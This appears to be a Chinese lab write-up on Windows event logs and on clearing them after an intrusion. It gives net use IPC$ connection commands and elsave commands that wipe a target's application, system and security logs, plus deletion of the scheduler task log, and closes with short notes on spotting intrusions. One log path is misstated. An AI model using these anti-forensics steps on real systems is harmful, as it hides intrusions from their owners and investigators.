elsave擦屁股

一.系统日志

系统日志是记录系统中硬件、软件和系统问题的信息，同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因，或者寻找受到攻击时攻击者留下的痕迹。

系统日志包括系统日志、应用程序日志和安全日志

一般来说，只要没有更改过，这些文件存在默认位置

系统日志：C:\WINDOWS\System32\config\SecEvent.Evt

应用程序日志：C:\WINDOWS\system32\config\AppEvent.Evt

安全日志：C:\WINDOWS\System32\config\SecEvent.Evt

其他记录计算机行为的日志：

DNS日志：%systemroot%\system32\config\DnsEvent.EVT；

Internet信息服务FTP日志：%systemroot%\system32\logfiles\msftpsvc1\

Internet信息服务WWW日志：%systemroot%\system32\logfiles\w3svc1\

Scheduler计划任务服务日志：%systemroot%\Tasks\schedlgu.txt，由于系统屏蔽的原因，只能在命令行下查看。

二.日志查看

查看系统日志方法:开始→设置→控制面板→管理工具 中找到的“事件查看器”

查看对方详细：

对方日志存放文件路径

三.清除日志

查看IP：

ipconfig

连接对方：

net use \\对方IP地址\ipc$ “” /user:"" 与远程主机建立空管连接

net use \\对方IP地址\ipc$ “密码” /user:“Administrator” 以管理员身份登录远程主机

net use \ \IP地址\ipc$ /delete 断开连接

擦屁股：

elsave工具：

elsave.exe -s \\对方ip -l "application" -C 清除目标系统的应用程序日志

elsave.exe -s \\对方IP -l "system" -C 清除目标系统的系统日志

elsave.exe -s \\对方IP -l "security" -C 清除目标系统的安全日志

在自己电脑上也擦擦：

删除计划任务日志

进入日志所在文件夹下（%systemroot%\Tasks）

net stop schedule 停止服务（因为程序使用目标删除文件，被保护了)

del "*.*"

查看对方IP

我的主机已经安装好elsave工具

自己电脑连接对方：

解决：本机上设置环境变量

查看elsave问题解决成功没（没有出现不是内部或者外部就成功了，输入这个主要原因是命令短）

成功入侵

执行删除：

中途跑到对方电脑查看删除成功没

继续删除：

删除计划任务日志

在我方电脑上删除

1）还有哪些途径可以发现网络中存在的攻击或者入侵。

漏洞扫描、入侵检测技术

注意电脑是否有异常活动：

电脑密码失效。

电脑设置出现并非由你本人做的巨大改变。

文件内容被更改。

有些外部设备在你没有使用的情况下似乎被打开过，比如摄像头、麦克风或全球定位导航系统。

2）清理日志能否把所有的痕迹都清理干净。

不能